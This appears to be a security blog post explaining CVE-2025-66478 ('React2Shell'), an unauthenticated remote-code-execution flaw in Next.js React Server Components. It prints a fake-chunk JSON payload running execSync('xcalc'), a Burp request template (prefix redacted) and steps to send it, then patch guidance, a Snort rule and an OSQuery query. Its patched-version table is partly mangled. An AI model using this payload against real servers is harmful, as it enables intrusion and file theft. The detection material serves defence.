Breaking Down the Next.js RCE a critical vulnerability, CVE-2025–66478 (React2Shell)
Breaking Down the Next.js RCE a critical vulnerability, CVE-2025–66478 (React2Shell)
Introduction
React Server Components (RSC) let components be rendered on the server instead of the browser. This improves performance because heavy computations happen on the server, sending only the rendered output to the client.
Communication between server and client uses the React Flight protocol, which serializes and deserializes data. When a client triggers a Server Action, it sends serialized data, which the server processes.
In December 2025, a critical vulnerability, CVE-2025–66478, was discovered in React Server Components (RSC), particularly affecting Next.js. Dubbed “React2Shell”, it allows unauthenticated remote code execution (RCE) through a single, specially crafted HTTP request. Its maximum CVSS score of 10.0 shows how severe it is.
When exploited, an attacker can make the server run any command, such as:
- Reading files
- Stealing environment variables
- Triggering DNS callbacks
- Running system commands
This article breaks down how the exploit works, and how attackers craft payloads to abuse it.
The vulnerability lies in this serialization format. It allows references like:
$@→ chunk reference$B→ Blob reference$1:constructor:constructor→ a property path
If unchecked, these references can let an attacker reach JavaScript’s Function constructor, enabling arbitrary code execution.
Exploitation Chain
- Fake Chunk Object
The attacker sends a fake React chunk via a multipart form. It looks like:
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}React treats this object as a normal chunk. By pointing then to the chunk’s prototype, the fake chunk becomes self-referential and triggers execution.
Example of Exploit
Scan target to confirm if it vulnerable to Next.js RCE
Using Next.js RSC RCE scanner, follow the link to download and install scanner
Open burpsuite,
Go to Repeater tab. Then click on the “+” button under Repeater and choose New HTTP tab.
Using this payload, copy and paste on burpsuite new HTTP tab you created,
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
<<REDACTED CODE>> // can't provide code for exploit educational purpose
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1""$@0"------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--Specify target, clicking on Target: not specified ontarget not specified top right corner of your screen, set parametter and send payload.
Results.
 |
| etc passwd file exposed using RCE |
Mitigation and How to Stay Protected
CVE‑2025‑66478 is extremely dangerous because it allows unauthenticated Remote Code Execution through one HTTP request. The good news is that the fix is simple and already available.
Below are the recommended mitigation steps.
1. Update React & Next.js Immediately
The vulnerability affects:
Vulnerable versions:
Safe (patched) versions:
ComponentPatched VersionReact 19.0.1, 19.1.2, 19.2.1Next.js All versions that ship these React patches
Fixed (patched) React versions are 19.0.1, 19.1.2, 19.2.1 — update immediately if you use RSC. React+1
- For Next.js applications using RSC with the App Router (i.e. affected by CVE-2025-66478), upgrade to one of the patched Next.js releases: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 or 16.0.7. Next.js+1
If you are on a Next.js canary (e.g.
14.3.0-canary.77 or later canary), downgrade to the latest stable 14.x version. Next.js.As an interim layer (while patching), you may deploy WAF or similar request‑filter protections to block suspicious payloads for instance by filtering out unusual
multipart/form-datarequests or unexpected headers associated with the exploit pattern. Several cloud providers and security vendors have already released such protective WAF rules tailored for React2Shell.
Detection & Monitoring
One of the advantages of detecting CVE‑2025‑66478 (“React2Shell”) is that exploitation requires a very specific request structure. Instead of trying to inspect the attacker’s payload — which can vary — we can detect the shape of the request, which is always similar.
Below are two practical detection methods: Snort for network‑level monitoring and OSQuery for endpoint‑level package inspection.
Snort 3 Detection Rule
Snort can flag incoming HTTP requests that match the exploitation pattern.
alert http any any -> $LAN_NETWORK any (
msg:"Potential Next.js React2Shell / CVE-2025-66478 attempt";
flow:to_server,established;
content:"Next-Action"; http_header; nocase;
content:"multipart/form-data"; http_header; nocase;
pcre:"/Content-Disposition:\s*form-data;\s*name=\"0\"/s";
pcre:"/\"status\"\s*:\s*\"resolved_model\"/s";
pcre:"/\"then\"\s*:\s*\"\$1:__proto__:then\"/s";
classtype:web-application-attack;
sid:6655001;
rev:1;
)What this rule looks for
This rule detects:
- Requests containing the non‑standard
Next-Actionheader.
This header is normally only used internally by Next.js and should never appear in normal browser traffic. - Requests with a multipart/form-data body
React Server Components almost never use this format.
Exploits must use it to pass the crafted chunk object. - Presence of the name=”0" form field
Every public exploit requires a"0"field because that is where the malicious fake chunk object is placed. - Key patterns from the exploit JSON, such as:
"status": "resolved_model""then": "$1:__proto__:then"
These values do not appear in normal applications.
So even without knowing the full payload, Snort can reliably detect attack attempts.
OSQuery Detection Rule
OSQuery lets you inspect what NPM packages (and versions) are installed on a system.
This helps detect the vulnerability before deployment or during CI/CD.
{
"queries": {
"detect_rev2shell_react_server_components": {
"query": "SELECT name, version, path FROM npm_packages WHERE (name='react-server-dom-parcel' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0')) OR (name='react-server-dom-turbopack' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0')) OR (name='react-server-dom-webpack' AND (version='19.0.0' OR (version >= '19.1.0' AND version < '19.1.2') OR version='19.2.0'));",
"interval": 3600,
"description": "Detects vulnerable versions of React Server Components packages (react-server-dom-*) affected by CVE-2025-55182 / CVE-2025-66478 / React2Shell.",
"platform": "linux,windows,macos",
"version": "1.0"
}
}
}What this rule does
This OSQuery configuration:
- Scans for the three vulnerable packages:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack
Flags installations of vulnerable versions:
19.0.019.1.019.1.119.2.0
Why this is valuable
- It identifies vulnerable apps in CI/CD pipelines
- It can detect vulnerable packages on developer machines
- It helps security teams find exposure before an attacker does
About Abdullahi Abdulmalik
No comments